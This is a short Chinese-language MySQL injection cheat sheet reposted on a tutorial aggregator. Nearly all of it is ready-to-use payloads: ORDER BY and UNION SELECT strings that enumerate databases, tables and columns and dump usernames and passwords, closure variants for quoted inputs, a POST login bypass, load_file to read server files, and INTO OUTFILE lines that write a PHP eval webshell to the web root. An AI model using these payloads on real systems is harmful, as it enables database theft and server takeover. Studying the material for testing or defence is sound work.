Mysql注入笔记

内容导读

互联网集市收集整理的这篇技术教程文章主要介绍了Mysql注入笔记，小编现在分享给大家，供广大互联网技能从业者学习和参考。文章包含1335字，纯文字阅读大概需要2分钟。

内容图文

1.基于字符型报错注入

报字段数：

‘ order by 3 --+    // “+” 代表空格

‘ union select 1,2,3 --+

‘ UNION SELECT 1,GROUP_CONCAT(SCHEMA_NAME),3 FROM INFORMATION_SCHEMA.SCHEMATA --+  // 获取数据库信息

‘ UNION SELECT 1,GROUP_CONCAT(TABLE_NAME),3 FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=0x7365637572697479 --+  // 获取表信息

‘ UNION SELECT 1,GROUP_CONCAT(COLUMN_NAME),3 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 0x7573657273 --+  // 获取表字段信息

‘ UNION SELECT 1,GROUP_CONCAT(username,0x3a,password,0x20),3 FROM security.users --+ // 获取数据o

2.基于数字型报错注入

不需要使用 ‘ 进行闭合，直接利用，利用方法和字符型一样

3.字符型报错注入（带()）

‘) order by 3--+  // 使用 )进行闭合

4.字符型报错注入（带"）

") order by 3--+  // 

5. 导入导出函数

select load_file(“C://TEST.txt”);

select "<?php eval($_POST[‘chybeta‘])?>" into outfile ‘C:/phpstudy/WWW/test/webshell.php‘;

select "<?php eval($_POST[‘chybeta‘])?>" dumpfile ‘C:/phpstudy/WWW/test/webshell.php‘;

6.POST类型注入

uname=admin‘#&passwd=chybeta&submit=Submit

uname=admin”#&passwd=chybeta&submit=Submit

Mysql注入笔记

标签：sch   获取   信息   pst   amp   导入导出   into   file   需要   

本文系统来源：http://www.cnblogs.com/seeker01/p/7988875.html

内容总结

以上是互联网集市为您收集整理的Mysql注入笔记全部内容，希望文章能够帮你解决Mysql注入笔记所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错，欢迎将互联网集市网站推荐给程序员好友。

内容备注

版权声明：本文内容由互联网用户自发贡献，该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容， 请发送邮件至 gblab@vip.qq.com 举报，一经查实，本站将立刻删除。

内容手机端